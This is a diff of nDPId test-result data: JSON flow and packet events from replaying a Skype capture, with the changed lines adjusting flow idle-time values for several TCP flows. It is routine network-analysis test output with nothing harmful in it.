+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1431969665118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969665118,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0H2lAAEAGObLAqAEinTeCp8N9Abt3wuHWcQen4YAQECwlMAAAAQEICj4i48JOq7ds"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAABA9S9AAEAGY\/DAqAEinTeClsN+nEtADbnoAAAAALAC\/\/\/YlwAAAgQFtAEDAwUBAQgKPiLk6gAAAAAEAgAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1j8QAAEARCNrAqAEiQTffGDLdnGAAISuNnAoCfsB5JB\/rTYpH1Pyy3TEn61xOyU3n6Q=="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -371,8 +371,8 @@ 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+hGcAAEARenXAqAEib91KKzLdnEEAKumHnBICbsOSISjTImKbV\/UiCWod5a6w5EFlZL740jo5mcYkgQ=="} 00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1431969665632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969665632,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiSdN4KWwKgBIpxLw35DcUQuQA256aASOJA7FQAAAgQFrAQCCApOt5+TPiLk6gEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1431969665632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969665632,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tVZAAEAGo9XAqAEinTeClsN+nEtADbnpQ3FEL4AQECyRaAAAAQEICj4i5cFOt5+T"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1431969665632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969665632,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiSdN4KWwKgBIpxLw35DcUQuQA256aASOJA7FQAAAgQFrAQCCApOt5+TPiLk6gEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1431969665632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969665632,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tVZAAEAGo9XAqAEinTeClsN+nEtADbnpQ3FEL4AQECyRaAAAAQEICj4i5cFOt5+T"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QwsAAEARVYDAqAEiQTffLDLdnE0AIF\/DnBQCMyjz3r9eJ18XTFVNiAvxrYpQ3ucg"} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -388,12 +388,12 @@ 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAAy3VkAAEARCjDAqAEinTg0LzLdnF0AHgzhnBwC9HB1yp1CFIBUD5AqeEDWvWy7jA=="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667019,"flow_last_seen":1431969667019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969667019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1431969667019,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969667019,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYg5AAEAG9xHAqAEinTeClsOAAbtI+pnpAAAAALAC\/\/+D\/AAAAgQFtAEDAwUBAQgKPiLrJgAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1431969667145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969667145,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiSdN4KWwKgBIgG7w4C5VVBeSPqZ6qASOJBi1AAAAgQFrAQCCApOt6EkPiLrJgEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":3,"flow_last_seen":1431969667145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969667145,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0EhFAAEAGRxvAqAEinTeClsOAAbtI+pnquVVQX4AQECy5ggAAAQEICj4i66JOt6Ek"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":753,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1431969667439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969667439,"pkt":"0NQSxnP1PBXCt3IOCABFAABAvH9AAEAGnJDAqAEinTeCpsOBnFXYqqHbAAAAALAC\/\/9QDQAAAgQFtAEDAwUBAQgKPiLsxwAAAAAEAgAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667019,"flow_last_seen":1431969667019,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969667019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1431969667019,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969667019,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYg5AAEAG9xHAqAEinTeClsOAAbtI+pnpAAAAALAC\/\/+D\/AAAAgQFtAEDAwUBAQgKPiLrJgAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1431969667145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969667145,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiSdN4KWwKgBIgG7w4C5VVBeSPqZ6qASOJBi1AAAAgQFrAQCCApOt6EkPiLrJgEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":3,"flow_last_seen":1431969667145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969667145,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0EhFAAEAGRxvAqAEinTeClsOAAbtI+pnquVVQX4AQECy5ggAAAQEICj4i66JOt6Ek"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":753,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1431969667439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969667439,"pkt":"0NQSxnP1PBXCt3IOCABFAABAvH9AAEAGnJDAqAEinTeCpsOBnFXYqqHbAAAAALAC\/\/9QDQAAAgQFtAEDAwUBAQgKPiLsxwAAAAAEAgAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1431969667439,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969667439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9SW0AAEAR5iPAqAEi1cezjTLdnE8AKQ5hnB4CGyqpujGNRC+tNfD9NfpLzFflMbzl80z6vtvIbjHD"} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -409,8 +409,8 @@ 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1431969667440,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969667440,"pkt":"0NQSxnP1PBXCt3IOCABFAABBc7oAAEARJM\/AqAEiQTffITLdnEsALfH+nCYCgzglH2UUEeAloaKWvjnBLcR69MpntGSFdWneylROBFqJdg=="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1431969667679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969667679,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhSdN4KmwKgBIpxVw4FWpWbU2Kqh3KASOJCyZwAAAgQFrAQCCApOrGnnPiLsxwEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1431969667679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969667679,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04YFAAEAGd5rAqAEinTeCpsOBnFXYqqHcVqVm1YAQECwIogAAAQEICj4i7bdOrGnn"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1431969667679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969667679,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhSdN4KmwKgBIpxVw4FWpWbU2Kqh3KASOJCyZwAAAgQFrAQCCApOrGnnPiLsxwEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1431969667679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969667679,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04YFAAEAGd5rAqAEinTeCpsOBnFXYqqHcVqVm1YAQECwIogAAAQEICj4i7bdOrGnn"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1431969668393,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969668393,"pkt":"0NQSxnP1PBXCt3IOCABFAABAuzMAAEARQDfAqAEib91NmzLdnEQALFAWnCgCEvePRGLJGr6Sre+ODORDkQCce9O5GJ9D557YPiPEFuAx"} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -420,10 +420,10 @@ 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668503,"flow_last_seen":1431969668503,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1431969668503,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1431969668503,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1431969668503,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABItzYAAEARPsPAqAFcwKgB\/+EV4RUANFGUU3BvdFVkcDB5FYpWEIvHwwABAARIlcIDhMAbG8d8ZX7RWey9o+VAQ2IEJyw="} 00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668503,"flow_last_seen":1431969668503,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1431969668503,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 